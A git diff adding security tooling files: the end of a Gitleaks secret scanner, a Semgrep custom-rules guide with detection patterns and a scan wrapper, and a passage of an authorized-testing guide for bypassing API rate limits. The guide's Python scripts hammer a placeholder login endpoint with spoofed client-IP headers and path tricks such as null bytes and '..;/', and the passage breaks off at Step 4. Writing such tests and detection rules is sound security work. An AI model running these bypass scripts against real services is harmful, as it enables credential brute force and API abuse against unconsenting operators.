+        "remediation_steps": [
+            f"1. Rotate the {f.rule_id} credential found in {f.file}"
+            for f in scan_result.new_findings
+        ]
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Gitleaks Secret Scanning Pipeline")
+    parser.add_argument("--repo-path", required=True, help="Path to git repository")
+    parser.add_argument("--scan-type", default="detect", choices=["detect", "protect"],
+                        help="Scan type: detect (history) or protect (staged/pre-commit)")
+    parser.add_argument("--baseline", default=None, help="Path to baseline JSON file")
+    parser.add_argument("--commit-range", default=None,
+                        help="Git log range (e.g., HEAD~10..HEAD)")
+    parser.add_argument("--staged", action="store_true",
+                        help="Scan only staged changes (for pre-commit)")
+    parser.add_argument("--config", default=None, help="Path to .gitleaks.toml config")
+    parser.add_argument("--output", default="gitleaks-report.json", help="Output report path")
+    parser.add_argument("--fail-on-findings", action="store_true",
+                        help="Exit non-zero on new findings")
+    parser.add_argument("--create-baseline", action="store_true",
+                        help="Generate baseline from current findings")
+    args = parser.parse_args()
+
+    repo_path = os.path.abspath(args.repo_path)
+    start_time = datetime.now(timezone.utc)
+
+    print(f"[*] Running Gitleaks {args.scan_type} on {repo_path}")
+
+    raw_result = run_gitleaks(
+        repo_path,
+        scan_type=args.scan_type,
+        baseline_path=args.baseline,
+        commit_range=args.commit_range,
+        staged=args.staged,
+        config_path=args.config
+    )
+
+    if raw_result["exit_code"] == -1:
+        print(f"[ERROR] {raw_result['stderr']}")
+        sys.exit(2)
+
+    scan_result = ScanResult()
+    scan_result.findings = parse_findings(raw_result["findings"])
+    scan_result.scan_duration = (datetime.now(timezone.utc) - start_time).total_seconds()
+
+    if args.baseline:
+        baseline_fps = load_baseline(args.baseline)
+        scan_result.new_findings, scan_result.baseline_findings = classify_findings(
+            scan_result.findings, baseline_fps
+        )
+    else:
+        scan_result.new_findings = scan_result.findings
+        scan_result.baseline_findings = []
+
+    if args.create_baseline:
+        baseline_path = os.path.join(repo_path, ".gitleaks-baseline.json")
+        with open(baseline_path, "w") as f:
+            json.dump(raw_result["findings"], f, indent=2)
+        print(f"[*] Baseline created: {baseline_path}")
+        print(f"    Contains {len(raw_result['findings'])} findings")
+        return
+
+    report = generate_report(scan_result, repo_path)
+
+    output_path = os.path.abspath(args.output)
+    with open(output_path, "w") as f:
+        json.dump(report, f, indent=2)
+    print(f"[*] Report: {output_path}")
+
+    print(f"\n[*] Total: {len(scan_result.findings)} | "
+          f"New: {len(scan_result.new_findings)} | "
+          f"Baseline: {len(scan_result.baseline_findings)}")
+
+    if scan_result.new_findings:
+        print("\n[!] New secrets detected:")
+        for f in scan_result.new_findings:
+            print(f"  [{f.rule_id}] {f.file}:{f.line} (commit: {f.commit}, author: {f.author})")
+            print(f"    Secret: {f.secret}")
+
+    if report["quality_gate"]["passed"]:
+        print("\n[PASS] No new secrets detected.")
+    else:
+        print(f"\n[FAIL] {len(scan_result.new_findings)} new secrets found. Rotate immediately.")
+
+    if args.fail_on_findings and not report["quality_gate"]["passed"]:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/implementing-semgrep-for-custom-sast-rules/SKILL.md
+++ b/security/skills/implementing-semgrep-for-custom-sast-rules/SKILL.md
@@ -1,0 +1,331 @@
+---
+name: implementing-semgrep-for-custom-sast-rules
+description: Write custom Semgrep SAST rules in YAML to detect application-specific
+  vulnerabilities, enforce coding standards, and integrate into CI/CD pipelines.
+domain: cybersecurity
+subdomain: devsecops
+tags:
+- semgrep
+- sast
+- static-analysis
+- custom-rules
+- devsecops
+- code-security
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- GV.SC-07
+- ID.IM-04
+- PR.PS-04
+mitre_attack:
+- T1195
+- T1554
+- T1059.004
+---
+
+# Implementing Semgrep for Custom SAST Rules
+
+## Overview
+
+Semgrep is an open-source static analysis tool that uses pattern-matching to find bugs, enforce code standards, and detect security vulnerabilities. Custom rules are written in YAML using Semgrep's pattern syntax, making it accessible without requiring compiler knowledge. It supports 30+ languages including Python, JavaScript, Go, Java, and C.
+
+
+## When to Use
+
+- When deploying or configuring implementing semgrep for custom sast rules capabilities in your environment
+- When establishing security controls aligned to compliance requirements
+- When building or improving security architecture for this domain
+- When conducting security assessments that require this implementation
+
+## Prerequisites
+
+- Python 3.8+ or Docker
+- Semgrep CLI installed
+- Target codebase in a supported language
+
+## Installation
+
+```bash
+# Install via pip
+pip install semgrep
+
+# Install via Homebrew
+brew install semgrep
+
+# Run via Docker
+docker run -v "${PWD}:/src" returntocorp/semgrep semgrep --config auto /src
+
+# Verify
+semgrep --version
+```
+
+## Running Semgrep
+
+```bash
+# Auto-detect rules for your code
+semgrep --config auto .
+
+# Use Semgrep registry rules
+semgrep --config r/python.lang.security
+
+# Use custom rule file
+semgrep --config my-rules.yaml .
+
+# Use multiple configs
+semgrep --config auto --config ./custom-rules/ .
+
+# JSON output
+semgrep --config auto --json . > results.json
+
+# SARIF output for GitHub
+semgrep --config auto --sarif . > results.sarif
+
+# Filter by severity
+semgrep --config auto --severity ERROR .
+```
+
+## Writing Custom Rules
+
+### Basic Pattern Matching
+
+```yaml
+# rules/sql-injection.yaml
+rules:
+  - id: sql-injection-string-format
+    languages: [python]
+    severity: ERROR
+    message: |
+      Potential SQL injection via string formatting.
+      Use parameterized queries instead.
+    pattern: |
+      cursor.execute(f"..." % ...)
+    metadata:
+      cwe: ["CWE-89"]
+      owasp: ["A03:2021"]
+      category: security
+    fix: |
+      cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
+```
+
+### Pattern Operators
+
+```yaml
+rules:
+  - id: hardcoded-secret-in-code
+    languages: [python, javascript, typescript]
+    severity: ERROR
+    message: Hardcoded secret detected in source code
+    patterns:
+      - pattern-either:
+          - pattern: $VAR = "..."
+          - pattern: $VAR = '...'
+      - metavariable-regex:
+          metavariable: $VAR
+          regex: (?i)(password|secret|api_key|token|aws_secret)
+      - pattern-not: $VAR = ""
+      - pattern-not: $VAR = "changeme"
+      - pattern-not: $VAR = "PLACEHOLDER"
+    metadata:
+      cwe: ["CWE-798"]
+      category: security
+```
+
+### Taint Analysis
+
+```yaml
+rules:
+  - id: xss-taint-tracking
+    languages: [python]
+    severity: ERROR
+    message: User input flows to HTML response without sanitization
+    mode: taint
+    pattern-sources:
+      - pattern: request.args.get(...)
+      - pattern: request.form.get(...)
+      - pattern: request.form[...]
+    pattern-sinks:
+      - pattern: return render_template_string(...)
+      - pattern: Markup(...)
+    pattern-sanitizers:
+      - pattern: bleach.clean(...)
+      - pattern: escape(...)
+    metadata:
+      cwe: ["CWE-79"]
+      owasp: ["A03:2021"]
+```
+
+### Multiple Language Rule
+
+```yaml
+rules:
+  - id: insecure-random
+    languages: [python, javascript, go, java]
+    severity: WARNING
+    message: |
+      Using insecure random number generator. Use cryptographically
+      secure alternatives for security-sensitive operations.
+    pattern-either:
+      # Python
+      - pattern: random.random()
+      - pattern: random.randint(...)
+      # JavaScript
+      - pattern: Math.random()
+      # Go
+      - pattern: math/rand.Intn(...)
+      # Java
+      - pattern: new java.util.Random()
+    metadata:
+      cwe: ["CWE-330"]
+```
+
+### Enforce Coding Standards
+
+```yaml
+rules:
+  - id: require-error-handling
+    languages: [go]
+    severity: WARNING
+    message: Error return value not checked
+    pattern: |
+      $VAR, _ := $FUNC(...)
+    fix: |
+      $VAR, err := $FUNC(...)
+      if err != nil {
+        return fmt.Errorf("$FUNC failed: %w", err)
+      }
+
+  - id: no-console-log-in-production
+    languages: [javascript, typescript]
+    severity: WARNING
+    message: Remove console.log before merging to production
+    pattern: console.log(...)
+    paths:
+      exclude:
+        - "tests/*"
+        - "*.test.*"
+```
+
+### JWT Security Rules
+
+```yaml
+rules:
+  - id: jwt-none-algorithm
+    languages: [python]
+    severity: ERROR
+    message: JWT decoded without algorithm verification - allows token forgery
+    patterns:
+      - pattern: jwt.decode($TOKEN, ..., algorithms=["none"], ...)
+    metadata:
+      cwe: ["CWE-347"]
+
+  - id: jwt-no-verification
+    languages: [python]
+    severity: ERROR
+    message: JWT decoded with verification disabled
+    patterns:
+      - pattern: jwt.decode($TOKEN, ..., options={"verify_signature": False}, ...)
+    metadata:
+      cwe: ["CWE-345"]
+```
+
+## Rule Testing
+
+```yaml
+# rules/test-sql-injection.yaml
+rules:
+  - id: sql-injection-format-string
+    languages: [python]
+    severity: ERROR
+    message: SQL injection via format string
+    pattern: |
+      cursor.execute(f"...{$VAR}...")
+
+# Test annotation in test file:
+# test-sql-injection.py
+def bad_query(user_id):
+    # ruleid: sql-injection-format-string
+    cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
+
+def good_query(user_id):
+    # ok: sql-injection-format-string
+    cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
+```
+
+```bash
+# Run rule tests
+semgrep --test rules/
+
+# Test specific rule
+semgrep --config rules/sql-injection.yaml --test
+```
+
+## CI/CD Integration
+
+### GitHub Actions
+
+```yaml
+name: Semgrep SAST
+on: [pull_request]
+
+jobs:
+  semgrep:
+    runs-on: ubuntu-latest
+    container:
+      image: returntocorp/semgrep
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Run Semgrep
+        run: |
+          semgrep --config auto \
+            --config ./custom-rules/ \
+            --sarif --output results.sarif \
+            --severity ERROR \
+            .
+
+      - name: Upload SARIF
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: results.sarif
+```
+
+### GitLab CI
+
+```yaml
+semgrep:
+  stage: test
+  image: returntocorp/semgrep
+  script:
+    - semgrep --config auto --config ./custom-rules/ --json --output semgrep.json .
+  artifacts:
+    reports:
+      sast: semgrep.json
+```
+
+## Configuration File
+
+```yaml
+# .semgrep.yaml
+rules:
+  - id: my-org-rules
+    # ... rules here
+
+# .semgrepignore
+tests/
+node_modules/
+vendor/
+*.min.js
+```
+
+## Best Practices
+
+1. **Start with auto config** then add custom rules for org-specific patterns
+2. **Test rules** with `# ruleid:` and `# ok:` annotations
+3. **Use taint mode** for data flow vulnerabilities (XSS, SQLi, SSRF)
+4. **Include metadata** (CWE, OWASP) for vulnerability classification
+5. **Provide fix suggestions** with the `fix` key where possible
+6. **Exclude test files** to reduce false positives
+7. **Version control rules** in a shared repository
+8. **Run in CI as a blocking check** for ERROR severity findings

--- a/security/skills/implementing-semgrep-for-custom-sast-rules/references/api-reference.md
+++ b/security/skills/implementing-semgrep-for-custom-sast-rules/references/api-reference.md
@@ -1,0 +1,196 @@
+# API Reference: Semgrep Custom SAST Rules
+
+## Libraries Used
+
+| Library | Purpose |
+|---------|---------|
+| `subprocess` | Execute semgrep CLI scans |
+| `json` | Parse semgrep JSON output |
+| `yaml` | Read and write custom Semgrep rule files |
+| `pathlib` | Handle source code and rule file paths |
+
+## Installation
+
+```bash
+# Python package
+pip install semgrep
+
+# Homebrew (macOS)
+brew install semgrep
+
+# Docker
+docker pull semgrep/semgrep:latest
+```
+
+## CLI Reference
+
+### Core Commands
+
+```bash
+# Scan with auto-detected rules
+semgrep scan --config auto --json --output results.json /path/to/code
+
+# Scan with specific rulesets from Semgrep Registry
+semgrep scan --config p/python --config p/owasp-top-ten /path/to/code
+
+# Scan with a custom rule file
+semgrep scan --config my-rules.yaml /path/to/code
+
+# Scan with multiple configs
+semgrep scan --config p/security-audit --config ./custom-rules/ /path/to/code
+```
+
+### Key CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--config`, `-c` | Rule source: registry key, YAML file, or directory |
+| `--json` | Output results in JSON format |
+| `--sarif` | Output in SARIF format (for CI/CD integration) |
+| `--output`, `-o` | Write results to file |
+| `--severity` | Filter by severity: `INFO`, `WARNING`, `ERROR` |
+| `--include` | Only scan files matching glob pattern |
+| `--exclude` | Skip files matching glob pattern |
+| `--lang` | Restrict scan to specific language |
+| `--max-target-bytes` | Skip files larger than N bytes |
+| `--timeout` | Per-rule timeout in seconds (default: 5) |
+| `--jobs`, `-j` | Number of parallel jobs |
+| `--verbose`, `-v` | Show detailed scan progress |
+| `--metrics off` | Disable anonymous metrics |
+
+## Custom Rule Syntax
+
+### Basic Pattern Rule
+```yaml
+rules:
+  - id: hardcoded-password
+    pattern: password = "..."
+    message: "Hardcoded password detected — use environment variables"
+    languages: [python]
+    severity: ERROR
+    metadata:
+      cwe: ["CWE-798: Use of Hard-coded Credentials"]
+      owasp: ["A07:2021 - Identification and Authentication Failures"]
+```
+
+### Pattern Operators
+```yaml
+rules:
+  - id: sql-injection-format-string
+    patterns:
+      - pattern: |
+          cursor.execute($QUERY % ...)
+      - pattern-not: |
+          cursor.execute("..." % ())
+    message: "SQL injection via string formatting — use parameterized queries"
+    languages: [python]
+    severity: ERROR
+
+  - id: unsafe-deserialization
+    pattern-either:
+      - pattern: pickle.loads(...)
+      - pattern: pickle.load(...)
+      - pattern: yaml.load(..., Loader=yaml.Loader)
+      - pattern: yaml.unsafe_load(...)
+    message: "Unsafe deserialization — may allow remote code execution"
+    languages: [python]
+    severity: ERROR
+
+  - id: missing-timeout-requests
+    patterns:
+      - pattern: requests.$METHOD(...)
+      - pattern-not: requests.$METHOD(..., timeout=..., ...)
+    message: "HTTP request without timeout — may hang indefinitely"
+    languages: [python]
+    severity: WARNING
+```
+
+### Metavariable Patterns
+```yaml
+rules:
+  - id: eval-user-input
+    patterns:
+      - pattern: |
+          $INPUT = request.$METHOD(...)
+          ...
+          eval($INPUT)
+    message: "User input passed to eval() — command injection risk"
+    languages: [python]
+    severity: ERROR
+```
+
+## Python Integration
+
+```python
+import subprocess
+import json
+
+def run_semgrep(target_path, config="auto", severity=None):
+    cmd = [
+        "semgrep", "scan",
+        "--config", config,
+        "--json",
+        "--metrics", "off",
+        str(target_path),
+    ]
+    if severity:
+        cmd.extend(["--severity", severity])
+
+    result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
+    output = json.loads(result.stdout)
+    return output.get("results", [])
+
+def summarize_findings(results):
+    by_severity = {"ERROR": [], "WARNING": [], "INFO": []}
+    for r in results:
+        sev = r.get("extra", {}).get("severity", "INFO")
+        by_severity[sev].append({
+            "rule": r["check_id"],
+            "file": r["path"],
+            "line": r["start"]["line"],
+            "message": r["extra"]["message"],
+        })
+    return by_severity
+```
+
+## Semgrep Registry Rule Packs
+
+| Pack | Description |
+|------|-------------|
+| `p/python` | Python-specific security and correctness rules |
+| `p/javascript` | JavaScript/TypeScript rules |
+| `p/owasp-top-ten` | OWASP Top 10 vulnerability patterns |
+| `p/security-audit` | Broad security audit rules across languages |
+| `p/secrets` | Secret and credential detection |
+| `p/ci` | Rules optimized for CI/CD pipelines |
+| `p/docker` | Dockerfile security best practices |
+| `p/terraform` | Terraform IaC security rules |
+
+## Output Format
+
+```json
+{
+  "results": [
+    {
+      "check_id": "python.lang.security.audit.eval-detected",
+      "path": "app/views.py",
+      "start": {"line": 42, "col": 5},
+      "end": {"line": 42, "col": 28},
+      "extra": {
+        "message": "Detected eval() usage — avoid with untrusted input",
+        "severity": "ERROR",
+        "metadata": {
+          "cwe": ["CWE-95"],
+          "owasp": ["A03:2021 - Injection"]
+        }
+      }
+    }
+  ],
+  "errors": [],
+  "stats": {
+    "findings": 3,
+    "errors": 0,
+    "total_time": 2.45
+  }
+}
+```

--- a/security/skills/implementing-semgrep-for-custom-sast-rules/references/standards.md
+++ b/security/skills/implementing-semgrep-for-custom-sast-rules/references/standards.md
@@ -1,0 +1,27 @@
+# Standards - Semgrep Custom SAST Rules
+
+## OWASP Top 10 (2021) Coverage
+
+| Category | Semgrep Detection |
+|----------|------------------|
+| A01 Broken Access Control | Authorization bypass patterns |
+| A02 Cryptographic Failures | Weak crypto, hardcoded secrets |
+| A03 Injection | SQL, XSS, command injection (taint mode) |
+| A04 Insecure Design | Missing input validation |
+| A05 Security Misconfiguration | Debug mode, insecure defaults |
+| A06 Vulnerable Components | Deprecated API usage |
+| A07 Auth Failures | JWT misconfig, session issues |
+| A08 Software/Data Integrity | Deserialization, unsigned data |
+| A09 Logging Failures | Missing audit logging |
+| A10 SSRF | Server-side request forgery (taint mode) |
+
+## CWE Coverage
+Common CWEs detectable via Semgrep custom rules: CWE-79 (XSS), CWE-89 (SQLi), CWE-798 (Hardcoded Credentials), CWE-330 (Insecure Random), CWE-502 (Deserialization), CWE-918 (SSRF)
+
+## NIST SP 800-53 Rev 5
+- SA-11: Developer Security Testing
+- SA-15: Development Process, Standards, and Tools
+
+## Compliance
+- PCI DSS v4.0 Req 6.3.2: Secure development with automated tools
+- SOC 2 CC8.1: Change management with code scanning

--- a/security/skills/implementing-semgrep-for-custom-sast-rules/scripts/agent.py
+++ b/security/skills/implementing-semgrep-for-custom-sast-rules/scripts/agent.py
@@ -1,0 +1,218 @@
+#!/usr/bin/env python3
+"""Semgrep SAST scanning agent.
+
+Wraps the Semgrep CLI to perform static application security testing
+using built-in rulesets and custom rules. Parses JSON output to produce
+structured vulnerability findings with severity, CWE, and OWASP mappings.
+"""
+import argparse
+import json
+import os
+import subprocess
+import sys
+from datetime import datetime, timezone
+
+
+def find_semgrep_binary():
+    """Locate the semgrep binary on the system."""
+    custom_path = os.environ.get("SEMGREP_PATH")
+    if custom_path and os.path.isfile(custom_path):
+        return custom_path
+    for name in ["semgrep", "semgrep.exe"]:
+        for directory in os.environ.get("PATH", "").split(os.pathsep):
+            full_path = os.path.join(directory, name)
+            if os.path.isfile(full_path):
+                return full_path
+    print("[!] semgrep not found. Install: pip install semgrep", file=sys.stderr)
+    sys.exit(1)
+
+
+def run_scan(semgrep_bin, target, configs=None, severity=None,
+             exclude=None, include=None, max_target_bytes=None,
+             timeout_per_rule=None, verbose=False):
+    """Run semgrep scan and return JSON results."""
+    cmd = [semgrep_bin, "scan", "--json"]
+
+    if configs:
+        for cfg in configs:
+            cmd.extend(["--config", cfg])
+    else:
+        cmd.extend(["--config", "auto"])
+
+    if severity:
+        cmd.extend(["--severity", severity])
+    if exclude:
+        for pattern in exclude:
+            cmd.extend(["--exclude", pattern])
+    if include:
+        for pattern in include:
+            cmd.extend(["--include", pattern])
+    if max_target_bytes:
+        cmd.extend(["--max-target-bytes", str(max_target_bytes)])
+    if timeout_per_rule:
+        cmd.extend(["--timeout", str(timeout_per_rule)])
+    if verbose:
+        cmd.append("--verbose")
+
+    cmd.append(target)
+
+    print(f"[*] Running: {' '.join(cmd)}")
+    result = subprocess.run(
+        cmd,
+        capture_output=True,
+        text=True,
+        timeout=900,
+    )
+    return result.stdout, result.stderr, result.returncode
+
+
+def parse_findings(raw_json):
+    """Parse semgrep JSON output into structured findings."""
+    findings = []
+    if not raw_json:
+        return findings, {}
+    try:
+        data = json.loads(raw_json)
+    except json.JSONDecodeError:
+        return findings, {}
+
+    errors = data.get("errors", [])
+    for result in data.get("results", []):
+        metadata = result.get("extra", {}).get("metadata", {})
+        finding = {
+            "rule_id": result.get("check_id", "unknown"),
+            "message": result.get("extra", {}).get("message", ""),
+            "severity": result.get("extra", {}).get("severity", "WARNING"),
+            "path": result.get("path", ""),
+            "start_line": result.get("start", {}).get("line", 0),
+            "end_line": result.get("end", {}).get("line", 0),
+            "matched_code": result.get("extra", {}).get("lines", ""),
+            "fix": result.get("extra", {}).get("fix", ""),
+            "cwe": metadata.get("cwe", []),
+            "owasp": metadata.get("owasp", []),
+            "confidence": metadata.get("confidence", ""),
+            "references": metadata.get("references", []),
+            "category": metadata.get("category", ""),
+            "technology": metadata.get("technology", []),
+        }
+        findings.append(finding)
+
+    stats = {
+        "total_findings": len(findings),
+        "files_scanned": data.get("paths", {}).get("scanned", []),
+        "files_scanned_count": len(data.get("paths", {}).get("scanned", [])),
+        "errors": len(errors),
+        "parse_errors": [e.get("message", "") for e in errors[:5]],
+    }
+    return findings, stats
+
+
+def format_summary(findings, stats, target):
+    """Print human-readable scan summary."""
+    print(f"\n{'='*60}")
+    print(f"  Semgrep SAST Scan Report")
+    print(f"{'='*60}")
+    print(f"  Target       : {target}")
+    print(f"  Files Scanned: {stats.get('files_scanned_count', 0)}")
+    print(f"  Findings     : {len(findings)}")
+    print(f"  Parse Errors : {stats.get('errors', 0)}")
+
+    severity_counts = {}
+    for f in findings:
+        sev = f.get("severity", "WARNING")
+        severity_counts[sev] = severity_counts.get(sev, 0) + 1
+
+    print(f"\n  By Severity:")
+    for sev in ["ERROR", "WARNING", "INFO"]:
+        count = severity_counts.get(sev, 0)
+        if count > 0:
+            print(f"    {sev:10s}: {count}")
+
+    by_rule = {}
+    for f in findings:
+        by_rule.setdefault(f["rule_id"], []).append(f)
+
+    print(f"\n  Top Rules ({len(by_rule)} unique):")
+    for rule, items in sorted(by_rule.items(), key=lambda x: -len(x[1]))[:10]:
+        short_rule = rule.split(".")[-1] if "." in rule else rule
+        print(f"    {short_rule:45s}: {len(items)} hit(s)")
+
+    by_file = {}
+    for f in findings:
+        by_file.setdefault(f["path"], []).append(f)
+
+    print(f"\n  Most Affected Files ({len(by_file)} files):")
+    for filepath, items in sorted(by_file.items(), key=lambda x: -len(x[1]))[:10]:
+        print(f"    {filepath:50s}: {len(items)} finding(s)")
+
+    if findings:
+        print(f"\n  Critical/Error Findings:")
+        for f in findings[:15]:
+            if f["severity"] == "ERROR":
+                cwe = f["cwe"][0] if f["cwe"] else ""
+                print(f"    {f['path']}:{f['start_line']} [{cwe}] {f['rule_id']}")
+
+    return severity_counts
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Semgrep SAST scanning agent"
+    )
+    parser.add_argument("--target", required=True,
+                        help="Path to source code directory or file to scan")
+    parser.add_argument("--config", nargs="+", default=None,
+                        help="Semgrep config(s): auto, p/security-audit, p/owasp-top-ten, or path to .yaml")
+    parser.add_argument("--severity", choices=["INFO", "WARNING", "ERROR"],
+                        help="Minimum severity to report")
+    parser.add_argument("--exclude", nargs="+",
+                        help="File patterns to exclude (e.g., tests/ vendor/)")
+    parser.add_argument("--include", nargs="+",
+                        help="File patterns to include (e.g., *.py *.js)")
+    parser.add_argument("--timeout-per-rule", type=int, default=30,
+                        help="Timeout per rule in seconds (default: 30)")
+    parser.add_argument("--output", "-o", help="Output JSON report path")
+    parser.add_argument("--verbose", "-v", action="store_true")
+    args = parser.parse_args()
+
+    semgrep_bin = find_semgrep_binary()
+    print(f"[*] Using semgrep: {semgrep_bin}")
+
+    raw_json, stderr, exit_code = run_scan(
+        semgrep_bin, args.target, args.config, args.severity,
+        args.exclude, args.include, timeout_per_rule=args.timeout_per_rule,
+        verbose=args.verbose
+    )
+
+    findings, stats = parse_findings(raw_json)
+    severity_counts = format_summary(findings, stats, args.target)
+
+    report = {
+        "timestamp": datetime.now(timezone.utc).isoformat(),
+        "tool": "semgrep",
+        "target": args.target,
+        "configs": args.config or ["auto"],
+        "stats": stats,
+        "severity_counts": severity_counts,
+        "findings_count": len(findings),
+        "findings": findings,
+        "risk_level": (
+            "CRITICAL" if severity_counts.get("ERROR", 0) > 5
+            else "HIGH" if severity_counts.get("ERROR", 0) > 0
+            else "MEDIUM" if severity_counts.get("WARNING", 0) > 0
+            else "LOW"
+        ),
+    }
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"\n[+] Report saved to {args.output}")
+    elif args.verbose:
+        print(json.dumps(report, indent=2))
+
+    print(f"\n[*] Risk Level: {report['risk_level']}")
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-api-rate-limiting-bypass/SKILL.md
+++ b/security/skills/performing-api-rate-limiting-bypass/SKILL.md
@@ -1,0 +1,422 @@
+---
+name: performing-api-rate-limiting-bypass
+description: 'Tests API rate limiting implementations for bypass vulnerabilities by
+  manipulating request headers, IP addresses, HTTP methods, API versions, and encoding
+  schemes to circumvent request throttling controls. The tester identifies rate limit
+  headers, determines enforcement mechanisms, and attempts bypasses including X-Forwarded-For
+  spoofing, parameter pollution, case variation, and endpoint path manipulation. Maps
+  to OWASP API4:2023 Unrestricted Resource Consumption. Activates for requests involving
+  rate limit bypass, API throttling evasion, brute force protection testing, or API
+  abuse prevention assessment.
+
+  '
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- owasp
+- rate-limiting
+- throttling
+- brute-force
+- dos-prevention
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1027
+- T1055
+---
+# Performing API Rate Limiting Bypass
+
+## When to Use
+
+- Testing whether API rate limiting can be circumvented to enable brute force attacks on authentication endpoints
+- Assessing the effectiveness of API throttling controls against credential stuffing or account enumeration
+- Evaluating if rate limits are enforced consistently across all API versions, methods, and encoding formats
+- Testing if API gateway rate limiting can be bypassed through header manipulation or IP rotation
+- Validating that rate limits protect against resource exhaustion and denial-of-service conditions
+
+**Do not use** without written authorization. Rate limit testing involves sending high volumes of requests that may impact service availability.
+
+## Prerequisites
+
+- Written authorization specifying target endpoints and acceptable request volumes
+- Python 3.10+ with `requests`, `aiohttp`, and `asyncio` libraries
+- Burp Suite Professional with Turbo Intruder extension for high-speed testing
+- cURL for manual header manipulation testing
+- Knowledge of the target's CDN and WAF infrastructure (Cloudflare, AWS WAF, Akamai)
+- List of rate-limit bypass headers to test
+
+## Workflow
+
+### Step 1: Rate Limit Discovery and Baseline
+
+Identify how rate limiting is implemented:
+
+```python
+import requests
+import time
+
+BASE_URL = "https://target-api.example.com/api/v1"
+headers = {"Authorization": "Bearer <token>", "Content-Type": "application/json"}
+
+# Send requests and track rate limit headers
+def probe_rate_limit(endpoint, method="GET", count=100):
+    results = []
+    for i in range(count):
+        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers)
+        rate_headers = {
+            "limit": resp.headers.get("X-RateLimit-Limit") or resp.headers.get("X-Rate-Limit-Limit"),
+            "remaining": resp.headers.get("X-RateLimit-Remaining") or resp.headers.get("X-Rate-Limit-Remaining"),
+            "reset": resp.headers.get("X-RateLimit-Reset") or resp.headers.get("X-Rate-Limit-Reset"),
+            "retry_after": resp.headers.get("Retry-After"),
+            "status": resp.status_code
+        }
+        results.append(rate_headers)
+        if resp.status_code == 429:
+            print(f"Rate limited at request {i+1}: {rate_headers}")
+            return results, i+1
+        time.sleep(0.05)  # Small delay to avoid connection issues
+    print(f"No rate limit triggered after {count} requests")
+    return results, count
+
+# Test key endpoints
+login_results, login_threshold = probe_rate_limit("/auth/login", "POST", 200)
+api_results, api_threshold = probe_rate_limit("/users/me", "GET", 200)
+search_results, search_threshold = probe_rate_limit("/search?q=test", "GET", 200)
+
+print(f"\nRate Limit Summary:")
+print(f"  Login: Triggered at request {login_threshold}")
+print(f"  API: Triggered at request {api_threshold}")
+print(f"  Search: Triggered at request {search_threshold}")
+```
+
+### Step 2: IP-Based Bypass Techniques
+
+```python
+# Bypass Technique 1: Header-based IP spoofing
+IP_SPOOFING_HEADERS = [
+    "X-Forwarded-For",
+    "X-Real-IP",
+    "X-Original-Forwarded-For",
+    "X-Originating-IP",
+    "X-Remote-IP",
+    "X-Remote-Addr",
+    "X-Client-IP",
+    "X-Host",
+    "X-Forwarded-Host",
+    "True-Client-IP",
+    "Cluster-Client-IP",
+    "X-ProxyUser-Ip",
+    "Forwarded",
+    "CF-Connecting-IP",
+    "Fastly-Client-IP",
+    "X-Azure-ClientIP",
+    "X-Akamai-Client-IP",
+]
+
+def test_ip_spoofing_bypass(endpoint, method="POST", body=None):
+    """Test if IP spoofing headers bypass rate limiting."""
+    # First, trigger the rate limit normally
+    for i in range(200):
+        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=headers, json=body)
+        if resp.status_code == 429:
+            print(f"Rate limit triggered at request {i+1}")
+            break
+
+    # Now test each spoofing header
+    bypasses_found = []
+    for header in IP_SPOOFING_HEADERS:
+        spoofed_headers = {**headers, header: f"10.0.{i%256}.{(i*7)%256}"}
+        resp = requests.request(method, f"{BASE_URL}{endpoint}", headers=spoofed_headers, json=body)
+        if resp.status_code != 429:
+            bypasses_found.append(header)
+            print(f"[BYPASS] {header} -> {resp.status_code}")
+
+    return bypasses_found
+
+login_body = {"username": "test@example.com", "password": "wrongpassword"}
+bypasses = test_ip_spoofing_bypass("/auth/login", "POST", login_body)
+```
+
+### Step 3: Endpoint Variation Bypass
+
+```python
+# Bypass Technique 2: URL path variation
+def test_path_variation_bypass(base_endpoint, token):
+    """Test if path variations bypass rate limit tied to specific endpoint."""
+    variations = [
+        base_endpoint,                          # /api/v1/auth/login
+        base_endpoint + "/",                    # /api/v1/auth/login/
+        base_endpoint.upper(),                  # /API/V1/AUTH/LOGIN
+        base_endpoint + "?dummy=1",             # /api/v1/auth/login?dummy=1
+        base_endpoint + "#fragment",            # /api/v1/auth/login#fragment
+        base_endpoint + "%20",                  # /api/v1/auth/login%20
+        base_endpoint + "/..",                  # /api/v1/auth/login/..
+        base_endpoint.replace("/v1/", "/v2/"),  # /api/v2/auth/login
+        base_endpoint + ";",                    # /api/v1/auth/login;
+        base_endpoint + "\t",                   # Tab character
+        base_endpoint + "%00",                  # Null byte
+        base_endpoint + "..;/",                 # Spring path traversal
+    ]
+
+    # Trigger rate limit on original endpoint first
+    for i in range(200):
+        resp = requests.post(f"{BASE_URL}{base_endpoint}",
+                           headers={"Authorization": f"Bearer {token}"},
+                           json={"username": "test", "password": "wrong"})
+        if resp.status_code == 429:
+            break
+
+    # Test variations
+    for variant in variations:
+        try:
+            resp = requests.post(f"{BASE_URL}{variant}",
+                               headers={"Authorization": f"Bearer {token}"},
+                               json={"username": "test", "password": "wrong"})
+            if resp.status_code != 429:
+                print(f"[BYPASS] Path variation: {variant} -> {resp.status_code}")
+        except Exception:
+            pass
+
+test_path_variation_bypass("/auth/login", "<token>")
+```
+
+### Step 4: HTTP Method and Content-Type Bypass
+
+```python
